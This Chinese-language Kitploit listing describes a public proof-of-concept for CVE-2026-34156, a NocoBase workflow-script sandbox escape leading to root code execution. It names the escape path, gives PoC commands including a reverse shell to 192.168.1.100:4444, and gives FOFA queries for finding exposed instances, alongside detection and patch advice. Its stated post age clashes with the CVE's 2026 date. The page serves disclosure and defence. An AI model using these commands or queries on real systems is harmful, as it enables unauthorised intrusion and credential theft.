Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-34156 — CVE-2026-34156 | Kitploit
工具/GitHubGitHub/0xblackash/cve-2026-34156
漏洞分析代码分析漏洞利用Web应用程序漏洞利用CTF渗透测试学习与教育
GitHub0xblackash/cve-2026-34156

CVE-2026-34156

CVE-2026-34156

查看仓库
25个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🚨 CVE-2026-34156 - NocoBase 严重沙箱逃逸漏洞

ChatGPT Image Apr 3, 2026, 01_32_16 PM Critical CVSS 9.9 Exploit Public

NocoBase 中未经认证 / 低权限 → 以 root 身份远程代码执行


📌 概述

CVE-2026-34156 是 NocoBase(一个开源无代码/低代码平台)中的严重沙箱逃逸漏洞。

具备创建或执行工作流脚本节点能力(即使是低权限)的攻击者,可以逃逸 Node.js vm 沙箱,并在容器内实现以 root 身份完全远程代码执行。

受影响版本

  • NocoBase < 2.0.28

修复版本

  • NocoBase 2.0.28(于 2026 年 3 月发布)

🛠 漏洞详情

  • 组件:@nocobase/plugin-workflow-javascript(脚本节点)
  • 类型:通过 console._stdout.constructor.constructor 进行沙箱逃逸
  • 影响:
    • 以 root(uid=0)身份远程代码执行
    • 任意命令执行
    • 文件系统访问(fs)
    • 环境变量泄露(数据库凭据、机密信息)
    • 容器完全失陷

根本原因

传入沙箱的 console 对象来自宿主 realm,攻击者可沿原型链向上攀爬,访问到真正的 Function 构造器 → process.mainModule.require。


🚀 漏洞利用

概念验证(PoC)

root@kitploit:~
# Simple command execution
python3 CVE-2026-34156.py -u https://target.com -e [email protected] -p password -c "id"

# Reverse shell
python3 CVE-2026-34156.py -u https://target.com -r 192.168.1.100:4444

仓库包含:完整 PoC 脚本、Nuclei 模板和安全检测器。


🧪 检测

Nuclei 模板

root@kitploit:~
nuclei -u https://target -t cves/CVE-2026-34156.yaml

FOFA 搜索语法

root@kitploit:~
title="NocoBase" || title="Sign in - NocoBase"
title="NocoBase" && body="workflow"

🛡️ 缓解措施

  1. 立即升级至 NocoBase 2.0.28 或更高版本。
  2. 对不可信用户禁用工作流脚本节点。
  3. 以非 root 用户运行 NocoBase 容器。
  4. 在生产环境中使用更强的沙箱机制(例如 isolated-vm)。

📸 截图

cve-2026-34156

⚠️ 法律免责声明

本仓库仅供教育和授权安全研究使用。
仅可在您拥有或已获得明确书面测试许可的系统上使用。

未经授权的利用行为属于违法行为。


⭐ 致谢与参考

  • 发现者:未知(公开披露)
  • 补丁:NocoBase 安全团队
  • NVD:CVE-2026-34156
  • GitHub 安全公告:GHSA-px3p-vgh9-m57c

为安全社区而作 ❤️
保持安全。及时打补丁。

下载工具